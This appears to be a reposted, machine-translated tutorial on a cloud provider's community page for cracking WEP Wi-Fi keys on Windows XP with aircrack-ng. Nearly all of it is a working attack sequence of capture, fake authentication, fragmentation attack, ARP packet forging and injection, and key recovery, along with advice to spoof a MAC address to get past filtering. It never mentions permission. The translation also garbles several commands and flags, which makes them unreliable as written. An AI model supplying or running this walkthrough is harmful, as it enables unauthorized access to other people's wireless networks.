Use aircrack injection to crack WEP in XP

Source: Internet
Author: User

This article describes how to use airrack and injection attacks to crack WEP in Windows xp.
 
 
Preparation:
 
1. First, you need to correctly install the NIC Driver: If your Nic is not supported by commview, you need to install the wildpackets driver.
 
Nic supported by Commview
 
1. If your Nic is supported by commview, download the driver at the address below:
 
 
2. if not supported by commview, you can download the driver of widpackets:
 
 
Note: The following tutorial is performed on the premise that you correctly install the commview driver!
 
II.
You need to download this. dll file (only applicable to commview users ):
 
3. Download The aircrack package:
 
 
4. decompress the aircrack package to the root directory of any hard disk. Here I decompress it to drive C.
 
5. Place the commview. dll downloaded by B to the directory c: \ aircrack \
 
6. go to the c: \ program files \ commview for wifi \ directory (note that this directory will be available after the commview is installed, that is, the file you downloaded from A1), and find "ca2k. dll file, put "ca2k. dll ", copy to (c: \ aircrack ).
 
After completing the above preparations, you can start the official cracking!
 
 
Cracking:
1: open a command prompt (Start> RUN> cmd.exe)
2: Enter the following in the Command Prompt window:
Cd c: \ aircrack
Press ENTER
3. Enter the following in the prompt window with the same command:
Airserv-ng-d commview. dll
Press ENTER
The reply you see should be the same as below:
Opening card commview. dll
Setting chan 1
Opening sock port 666
Serving commview. dll chan 1 on port 666
 
If you do not see the above results, but see the following results:
 
Note that there may be two situations !!!!! :
 
(1)
"Opening card commview. dll
Adapter not found
Get_guid ()
Airserv-ng: wi_open (): No error"
In this case, you can try this command:
Airserv-ng-d "commview. dll | debug"
Then you may see the following results
 
Opening card commview. dll | debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
Get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co
MboCard Gold-Paketplaner-Miniport
Adapter not found
Get_guid ()
Airserv-ng: wi_open (): No error
 
You only need to enter the following command.
Airserv-ng-d "commview. dll | {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82 }"
 
Or the system will automatically search for the NIC and prompt you if it is the NIC. However, if you select yes/no, You need to select yes.
 
(2) "Opening card commview. dll
F1
Init_lib ()
Airserv-ng: wi_open (): No error"
 
In this case, you should have installed the windpackets driver. We recommend that you install the commview driver if possible.
 
 
Instance:
ESSID = wifi16 of the AP
 
BSSID = 11: 22: 33: 44: 55: 66
 
CHANNEL cracking AP = 6
 
MAC used to listen to the NIC by yourself = 01: 23: 45: 67: 89: 01
 
 
1. First listen to the AP
 
Airodump-ng -- channel 6 -- write Filename 127.0.0.1: 666
 
 
2. Create a virtual connection:
 
Aireplay-ng-1 0-e wifi16-a 11: 22: 33: 44: 55: 66-h 01: 23: 45: 67: 89: 01 127.0.0.1: 666
 
If everything is normal, you will get the following reply:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
 
If you get:
AP rejects the source MAC address
This indicates that your AP is configured with MAC filter, and you need to change your MAC address to the address allowed by the cracking network.
 
If you continue to get:
Sending authentication request
It means that you are too far away from cracking the network and the signal is too weak. You need to follow up on the network to obtain better signals.
 
 
3. attack using the-5 fragment attack mode
 
Aireplay-ng-5-B 11: 22: 33: 44: 55: 66-h 01: 23: 45: 67: 89: 01 127.0.0.1: 666
 
If successful, you will get an xor file, for example, the file is a fragment-0124-161129.xor
 
 
4. Construct an arp packet for Injection Using packetforge-ng
 
Packetforge-ng-0-a 11: 22: 33: 44: 55: 66-h 01: 23: 45: 67: 89: 01-k 192.168.1.100-l 192.168.1.1-y fragment-0124-161129.xor-w myarp
 
 
5. Use-2's arp injection attack mode for Injection
 
Aireplay-ng-2-r myarp 127.0.0.1: 666
 
 
6. Use aircrack to crack WP
 
Aircrack-ng-n 64 Filename. cap

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.